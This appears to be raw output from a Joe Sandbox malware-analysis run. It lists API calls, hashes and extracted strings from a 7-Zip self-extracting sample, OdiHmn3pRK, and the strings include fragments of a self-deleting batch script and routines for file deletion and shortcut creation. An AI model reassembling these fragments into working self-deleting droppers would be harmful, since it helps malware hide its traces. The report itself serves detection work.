• Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
Similarity
• API ID: ??2@
• String ID:
• API String ID: 1033339047-0
APIs
• ??2@YAPAXI@Z.MSVCRT(00000018,00000000,004044E9,?,?,?,?,?,?,?,?,?,?,00000000,00000020,?), ref: 00402F71
Memory Dump Source
• Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
Similarity
• API ID: ??2@
• String ID:
• API String ID: 1033339047-0
APIs
• CloseHandle.KERNELBASE(00000001,000000FF,0040DA61,00413330,?,0040DB39,L@,40000000,00000000,00000000,00000000,0040DB50,00000000,00000001,00000001,00000080), ref: 0040D990
Memory Dump Source
• Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
APIs
• VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,0040E4D6,00020000,00000000,?,00000000,?,0040D92B,?,?,00000000,?,0040D96E), ref: 004024E0
Memory Dump Source
• Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
APIs
• VirtualFree.KERNELBASE(00000000,00000000,00008000,0040E561,?,00000004,0040E5B0,?,?,004117E5,?), ref: 00401B2A
Memory Dump Source
• Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
Similarity
• API ID: FreeVirtual
• String ID:
• API String ID: 1263568516-0
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: free
                                                                  • String ID:
                                                                  • API String ID: 1294909896-0
                                                                  • Opcode ID: d9246d09a93a321ccd45a7f77b4b3a05b9734a8e70a1dc2b954ba7e43b8076d7
                                                                  • Instruction ID: 7baee4be7330d58fba6a4d3e6254b3dabd4481adb37f3967e502ba2394f26960
                                                                  • Opcode Fuzzy Hash: d9246d09a93a321ccd45a7f77b4b3a05b9734a8e70a1dc2b954ba7e43b8076d7
                                                                  • Instruction Fuzzy Hash:
                                                                  APIs
                                                                  • _wtol.MSVCRT ref: 004034E5
                                                                  • SHGetSpecialFolderPathW.SHELL32(00000000,?,CC5BE863,00000000,004177A0,00000000,00417794), ref: 00403588
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 004035F9
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?), ref: 00403601
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?), ref: 00403609
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?), ref: 00403611
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?), ref: 00403619
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?), ref: 00403621
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?), ref: 00403629
                                                                  • _wtol.MSVCRT ref: 0040367F
                                                                  • CoCreateInstance.OLE32(00414BF4,00000000,00000001,00414BE4,00404F9B,.lnk,?,0000005C), ref: 00403720
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,0000005C), ref: 004037B8
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,0000005C), ref: 004037C0
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,0000005C), ref: 004037C8
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0000005C), ref: 004037D0
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,0000005C), ref: 004037D8
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,0000005C), ref: 004037E0
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,0000005C), ref: 004037E8
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,0000005C), ref: 004037EE
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,0000005C), ref: 004037F6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: ??3@$_wtol$CreateFolderInstancePathSpecial
                                                                  • String ID: .lnk
                                                                  • API String ID: 408529070-24824748
                                                                  • Opcode ID: cb1a116a375c0276f3cc47ebae34f017b071fc5c88c5a353f484599fe5934efa
                                                                  • Instruction ID: c4a1d47ac56633071a1bd2db01059e5edb54ffe0bccc65637149caefe5d2277b
                                                                  • Opcode Fuzzy Hash: cb1a116a375c0276f3cc47ebae34f017b071fc5c88c5a353f484599fe5934efa
                                                                  • Instruction Fuzzy Hash: 8EA18A71910219ABDF04EFA1CC46DEEBB79EF44705F50442AF502B71A1EB79AA81CB18
                                                                  APIs
                                                                  • GetLastError.KERNEL32(00000000,00000020,?), ref: 00401FEC
                                                                  • wsprintfW.USER32 ref: 00401FFD
                                                                  • GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00402012
                                                                  • GetLastError.KERNEL32 ref: 00402017
                                                                  • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00402032
                                                                  • GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00402045
                                                                  • GetLastError.KERNEL32 ref: 0040204C
                                                                  • lstrcmpiW.KERNEL32(00000000,00000020), ref: 00402061
                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00402071
                                                                  • ??3@YAXPAX@Z.MSVCRT(00000020), ref: 0040208F
                                                                  • SetLastError.KERNEL32(00000000), ref: 00402098
                                                                  • lstrlenA.KERNEL32(00413FD0), ref: 004020CC
                                                                  • ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004020E7
                                                                  • GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402119
                                                                  • _wtol.MSVCRT ref: 0040212A
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00413FD0,00000001,00000000,00000002), ref: 0040214A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$??2@??3@EnvironmentVariable$ByteCharInfoLocaleMultiWide_wtollstrcmpilstrlenwsprintf
                                                                  • String ID: 7zSfxString%d$XpA$\3A
                                                                  • API String ID: 2117570002-3108448011
                                                                  • Opcode ID: 332d11925e247980b34bd098e8b038dc96ba1155979fc83484f9ac8f636b93aa
                                                                  • Instruction ID: 5c0681f152172bce6659d4e02be164ba9bb36eab7c70e8d4f1a0ed4420d73572
                                                                  • Opcode Fuzzy Hash: 332d11925e247980b34bd098e8b038dc96ba1155979fc83484f9ac8f636b93aa
                                                                  • Instruction Fuzzy Hash: 11518471604305AFDB209F74DD899DBBBB9EB08345B11407AF646E62E0E774AA44CB18
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00401BEA
                                                                  • FindResourceExA.KERNEL32(00000000,?,?,00000000), ref: 00401C07
                                                                  • FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 00401C1B
                                                                  • SizeofResource.KERNEL32(00000000,00000000), ref: 00401C2C
                                                                  • LoadResource.KERNEL32(00000000,00000000), ref: 00401C36
                                                                  • LockResource.KERNEL32(00000000), ref: 00401C41
                                                                  • LoadLibraryA.KERNEL32(kernel32,SetProcessPreferredUILanguages), ref: 00401C6D
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00401C76
                                                                  • wsprintfW.USER32 ref: 00401C95
                                                                  • LoadLibraryA.KERNEL32(kernel32,SetThreadPreferredUILanguages), ref: 00401CAA
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00401CAD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: Resource$Load$AddressFindLibraryProc$HandleLockModuleSizeofwsprintf
                                                                  • String ID: %04X%c%04X%c$SetProcessPreferredUILanguages$SetThreadPreferredUILanguages$kernel32
                                                                  • API String ID: 2639302590-365843014
                                                                  • Opcode ID: a5d0d847a20e007311d4afefc35bdd0d1043cb70ace8406c3a5a944bd10805b9
                                                                  • Instruction ID: 1b367ad183524107b1556f539f271e2bfa11f4d2ebd4ebc35158efee647c5c94
                                                                  • Opcode Fuzzy Hash: a5d0d847a20e007311d4afefc35bdd0d1043cb70ace8406c3a5a944bd10805b9
                                                                  • Instruction Fuzzy Hash: 002153B1944318BBDB109FA59D48F9B7FBCEB48751F118036FA05B72D1D678DA008BA8
                                                                  APIs
                                                                  • wvsprintfW.USER32(?,00000000,?), ref: 0040779A
                                                                  • GetLastError.KERNEL32(?,00000000,0000FDE9), ref: 004077AB
                                                                  • FormatMessageW.KERNEL32(00001100,00000000,00000000,00402A50,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077D3
                                                                  • FormatMessageW.KERNEL32(00001100,00000000,00402A50,00000000,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077E8
                                                                  • lstrlenW.KERNEL32(?,?,00000000,0000FDE9), ref: 004077FB
                                                                  • lstrlenW.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407802
                                                                  • ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,0000FDE9), ref: 00407817
                                                                  • lstrcpyW.KERNEL32(00000000,?,?,00000000,0000FDE9), ref: 0040782D
                                                                  • lstrcpyW.KERNEL32(-00000002,00402A50,?,00000000,0000FDE9), ref: 0040783E
                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,0000FDE9), ref: 00407847
                                                                  • LocalFree.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407851
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: FormatMessagelstrcpylstrlen$??2@??3@ErrorFreeLastLocalwvsprintf
                                                                  • String ID:
                                                                  • API String ID: 829399097-0
                                                                  • Opcode ID: bf60f95a6a1f59c2bb6c04e2e113b9a1b5cd8de0030c6a868400c9436056581d
                                                                  • Instruction ID: 98041b7e574f1f1c61a73cce3db0a13ad597614178cae5aaf21d0c5f67190c53
                                                                  • Opcode Fuzzy Hash: bf60f95a6a1f59c2bb6c04e2e113b9a1b5cd8de0030c6a868400c9436056581d
                                                                  • Instruction Fuzzy Hash: 85218172804209BEDF14AFA0DC85CEB7BACEB04355B10847BF506A7150EB34EE848BA4
                                                                  APIs
                                                                  • FindFirstFileW.KERNEL32(?,?,00413454,?,?,?,00000000), ref: 00402BA8
                                                                  • lstrcmpW.KERNEL32(?,00413450,?,0000005C,?,?,?,00000000), ref: 00402BFB
                                                                  • lstrcmpW.KERNEL32(?,00413448,?,?,00000000), ref: 00402C11
                                                                  • SetFileAttributesW.KERNEL32(?,00000000,?,0000005C,?,?,?,00000000), ref: 00402C27
                                                                  • DeleteFileW.KERNEL32(?,?,?,00000000), ref: 00402C2E
                                                                  • FindNextFileW.KERNEL32(00000000,00000010,?,?,00000000), ref: 00402C40
                                                                  • FindClose.KERNEL32(00000000,?,?,00000000), ref: 00402C4F
                                                                  • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000000), ref: 00402C5A
                                                                  • RemoveDirectoryW.KERNEL32(?,?,?,00000000), ref: 00402C63
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 00402C6E
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 00402C79
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: File$Find$??3@Attributeslstrcmp$CloseDeleteDirectoryFirstNextRemove
                                                                  • String ID:
                                                                  • API String ID: 1862581289-0
                                                                  • Opcode ID: 3adc14f40e23b1cdad4e4199877390cf68653eec517b691feb080405b1435fa2
                                                                  • Instruction ID: 7ffcf375551190f92b7aba4ef5ef3cd4ed0286f9dec59b0789af02bc25bdcc12
                                                                  • Opcode Fuzzy Hash: 3adc14f40e23b1cdad4e4199877390cf68653eec517b691feb080405b1435fa2
                                                                  • Instruction Fuzzy Hash: A321A230500209BAEB10AF61DE4CFBF7B7C9B0470AF14417AB505B11E0EB78DB459A6C
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(uxtheme,?,00407F57,000004B1,00000000,?,?,?,?,?,0040803E), ref: 00406D65
                                                                  • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 00406D76
                                                                  • GetWindow.USER32(?,00000005), ref: 00406D8F
                                                                  • GetWindow.USER32(00000000,00000002), ref: 00406DA5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: Window$AddressLibraryLoadProc
                                                                  • String ID: SetWindowTheme$\EA$uxtheme
                                                                  • API String ID: 324724604-1613512829
                                                                  • Opcode ID: 249f97bdfab0f17876e9996a58034084f131abf1d363e9cca7f48feb82d9f298
                                                                  • Instruction ID: f2e0bdee1e376373ef12be0a37c87caa708c4cf78f5ebad58458586032015049
                                                                  • Opcode Fuzzy Hash: 249f97bdfab0f17876e9996a58034084f131abf1d363e9cca7f48feb82d9f298
                                                                  • Instruction Fuzzy Hash: 47F0A73274172537C6312A6A6C4CF9B6B9C9FC6B51B070176B905F7280DA6CCD0045BC
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ff1f75169f88eb9072603f867e1b9c380318d13f71256e892471df4b1a5f26b0
                                                                  • Instruction ID: 2cf66fefa79674a345482580870fbecf2b771b639b37e27eb1fc897e4fc9b441
                                                                  • Opcode Fuzzy Hash: ff1f75169f88eb9072603f867e1b9c380318d13f71256e892471df4b1a5f26b0
                                                                  • Instruction Fuzzy Hash: 44126E31E00129DFDF08CF68C6945ECBBB2EF85345F2585AAD856AB280D6749EC1DF84
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6e2407533f79ef22d8e6d794d98aef535f9904e2ced6ea7e6753812806be966d
                                                                  • Instruction ID: 8743f1180a29be23716da9caa70fae7f7856ace610ba4dfa2102d12747f13ae8
                                                                  • Opcode Fuzzy Hash: 6e2407533f79ef22d8e6d794d98aef535f9904e2ced6ea7e6753812806be966d
                                                                  • Instruction Fuzzy Hash: D12129725104255BC711DF1DE8887B7B3E1FFC4319F678A36DA81CB281C629D894C6A0
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
                                                                  • Instruction ID: 7cc7f0f00d3fdf34bc0739e2af2c3edfb6ca911da6c9eaecf720caf4c907201e
                                                                  • Opcode Fuzzy Hash: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
                                                                  • Instruction Fuzzy Hash: 0621F53290062587CB12CE6EE4845A7F392FBC436AF134727EE84A3291C62CA855C6A0
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: dde32e57196543c58229ec3a92fed9e80e5316f67d8377c6540d091cf30b3fc0
                                                                  • Instruction ID: 0032c0c3dd355d3b1328166acc4be040b7821e5e83bc1fe28c274bced218c28f
                                                                  • Opcode Fuzzy Hash: dde32e57196543c58229ec3a92fed9e80e5316f67d8377c6540d091cf30b3fc0
                                                                  • Instruction Fuzzy Hash: 4EF074B5A05209EFCB09CFA9C49199EFBF5FF48304B1084A9E819E7350E731AA11CF50
                                                                  APIs
                                                                  • GetDriveTypeW.KERNEL32(?,?,?), ref: 00404B46
                                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00404B77
                                                                  • WriteFile.KERNEL32(004177C4,?,?,00406437,00000000,del ",:Repeat,00000000), ref: 00404C2C
                                                                  • ??3@YAXPAX@Z.MSVCRT(?), ref: 00404C37
                                                                  • CloseHandle.KERNEL32(004177C4), ref: 00404C40
                                                                  • SetFileAttributesW.KERNEL32(00406437,00000000), ref: 00404C57
                                                                  • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00404C69
                                                                  • ??3@YAXPAX@Z.MSVCRT(?), ref: 00404C72
                                                                  • ??3@YAXPAX@Z.MSVCRT(?), ref: 00404C7E
                                                                  • ??3@YAXPAX@Z.MSVCRT(00406437,?), ref: 00404C84
                                                                  • ??3@YAXPAX@Z.MSVCRT(00406437,?,?,?,?,?,?,?,?,?,?,?,?,?,00406437,004177C4), ref: 00404CB2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: ??3@$File$AttributesCloseCreateDriveExecuteHandleShellTypeWrite
                                                                  • String ID: "$" goto Repeat$7ZSfx%03x.cmd$:Repeat$del "$if exist "$open
                                                                  • API String ID: 3007203151-3467708659
                                                                  • Opcode ID: 867eebb51e1b750364ee620a5f1ec15cba4384e9a655442323ea2c3f34152715
                                                                  • Instruction ID: 7a4c4b622d76ac6c1822c64a370ea4e05d699ec4102568342bfcf68b8c9639ad
                                                                  • Opcode Fuzzy Hash: 867eebb51e1b750364ee620a5f1ec15cba4384e9a655442323ea2c3f34152715
                                                                  • Instruction Fuzzy Hash: DE416171D01119BADB00EBA5ED85DEEBB78EF44358F50803AF511720E1EB78AE85CB58
                                                                  APIs
                                                                  • lstrcmpiW.KERNEL32(00000000,0041442C,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004046DF
                                                                    • Part of subcall function 00401F9D: GetLastError.KERNEL32(00000000,00000020,?), ref: 00401FEC
                                                                    • Part of subcall function 00401F9D: wsprintfW.USER32 ref: 00401FFD
                                                                    • Part of subcall function 00401F9D: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00402012
                                                                    • Part of subcall function 00401F9D: GetLastError.KERNEL32 ref: 00402017
                                                                    • Part of subcall function 00401F9D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00402032
                                                                    • Part of subcall function 00401F9D: GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00402045
                                                                    • Part of subcall function 00401F9D: GetLastError.KERNEL32 ref: 0040204C
                                                                    • Part of subcall function 00401F9D: lstrcmpiW.KERNEL32(00000000,00000020), ref: 00402061
                                                                    • Part of subcall function 00401F9D: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00402071
                                                                    • Part of subcall function 00401F9D: SetLastError.KERNEL32(00000000), ref: 00402098
                                                                    • Part of subcall function 00401F9D: lstrlenA.KERNEL32(00413FD0), ref: 004020CC
                                                                    • Part of subcall function 00401F9D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004020E7
                                                                    • Part of subcall function 00401F9D: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402119
                                                                  • _wtol.MSVCRT ref: 004047DC
                                                                  • _wtol.MSVCRT ref: 004047F8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmp
